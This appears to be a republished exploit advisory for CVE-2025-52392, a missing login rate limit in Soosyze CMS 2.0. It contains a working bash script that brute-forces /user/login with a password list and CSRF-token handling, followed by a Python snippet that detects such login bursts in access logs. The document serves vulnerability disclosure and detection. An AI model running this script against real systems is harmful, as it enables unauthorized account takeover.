Soosyze CMS 2.0 Brute Force Login
Soosyze CMS 2.0 has a brute-force login vulnerability: because rate limiting and account lockout are missing, an attacker can submit unlimited POST requests to `/user/login` with a password dictionary, potentially gaining unauthorized access (CVE-2025-52392).

2025-12-17 23:1:31 Author: cxsecurity.com

# Exploit Title: Soosyze CMS 2.0 - Brute Force Login
# Google Dork: N/A
# Date: 2025-08-13
# Exploit Author: Beatriz Fresno Naumova (beafn28)
# Vendor Homepage: https://soosyze.com/
# Software Link: https://github.com/soosyze/soosyze
# Version: 2.0 (tested)
# Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed
# CVE : CVE-2025-52392
# Description:
# Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting
# and account lockout mechanisms. An attacker can submit unlimited POST requests with a known
# username/email and a password wordlist, potentially gaining unauthorized access (CWE-307).
# PoC Usage:
# ./script.sh [wordlist.txt]
# If no wordlist is provided, a dictionary is used.

#!/usr/bin/env bash
set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="[email protected]"
WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
COOKIE_JAR="$(mktemp)"

get_form() {
  curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

extract_token() {
  local name value
  name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true)
  value=""
  if [[ -n "$name" ]]; then
    value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true)
  fi
  printf '%s\t%s\n' "$name" "$value"
}

post_login() {
  local pass="$1" tname="$2" tval="$3"
  curl -sS -o /tmp/resp.html -w "%{http_code}" \
    -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
    -X POST "$form_url" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -H "Origin: $BASE_URL" -H "Referer: $form_url" \
    --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \
    --data-urlencode "$PASS_FIELD=$pass" \
    $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

echo "[*] Starting brute-force attack on $form_url"

[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
  i=$((i+1))
  get_form
  IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
  code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")
  if grep -q '"redirect"' /tmp/resp.html; then
    echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
    break
  else
    echo "[$i] '$pw' (HTTP $code)"
  fi
  sleep 0.$((RANDOM%9+1))
done

rm -f "$COOKIE_JAR" /tmp/resp.html
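As an added defender-side example (not part of the advisory or of the Soosyze project), the following Python flags the kind of burst of POST requests to /user/login that the PoC above generates, by keeping a per-client sliding window over combined-format access-log lines. The log excerpt, the IP addresses, the 60-second window and the threshold of 5 are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed access-log excerpt in combined format (not real traffic): 203.0.113.7
# hammers POST /user/login the way the PoC does; 198.51.100.2 is an ordinary user.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Aug/2025:10:00:01 +0000] "GET /user/login HTTP/1.1" 200 2311 "-" "curl/8.4.0"
203.0.113.7 - - [13/Aug/2025:10:00:01 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "curl/8.4.0"
203.0.113.7 - - [13/Aug/2025:10:00:02 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "curl/8.4.0"
203.0.113.7 - - [13/Aug/2025:10:00:03 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "curl/8.4.0"
198.51.100.2 - - [13/Aug/2025:10:00:03 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Aug/2025:10:00:04 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "curl/8.4.0"
203.0.113.7 - - [13/Aug/2025:10:00:05 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "curl/8.4.0"
203.0.113.7 - - [13/Aug/2025:10:00:06 +0000] "POST /user/login HTTP/1.1" 200 87 "-" "curl/8.4.0"
198.51.100.2 - - [13/Aug/2025:10:05:10 +0000] "POST /user/login HTTP/1.1" 200 131 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path")

def find_login_bursts(log_text, path="/user/login", window_s=60, threshold=5):
    """Map each client IP to the peak number of POSTs to `path` seen inside any
    `window_s`-second sliding window, keeping only IPs that reached `threshold`.
    The status code is ignored on purpose: the volume of attempts is the signal."""
    seen = defaultdict(deque)
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, p = rec
        if method != "POST" or p != path:
            continue
        q = seen[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged
```

Running `find_login_bursts(SAMPLE_LOG)` on the excerpt reports only 203.0.113.7, with six attempts inside one window; the two widely spaced logins from 198.51.100.2 never reach the threshold.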

Source: https://cxsecurity.com/issue/WLB-2025120016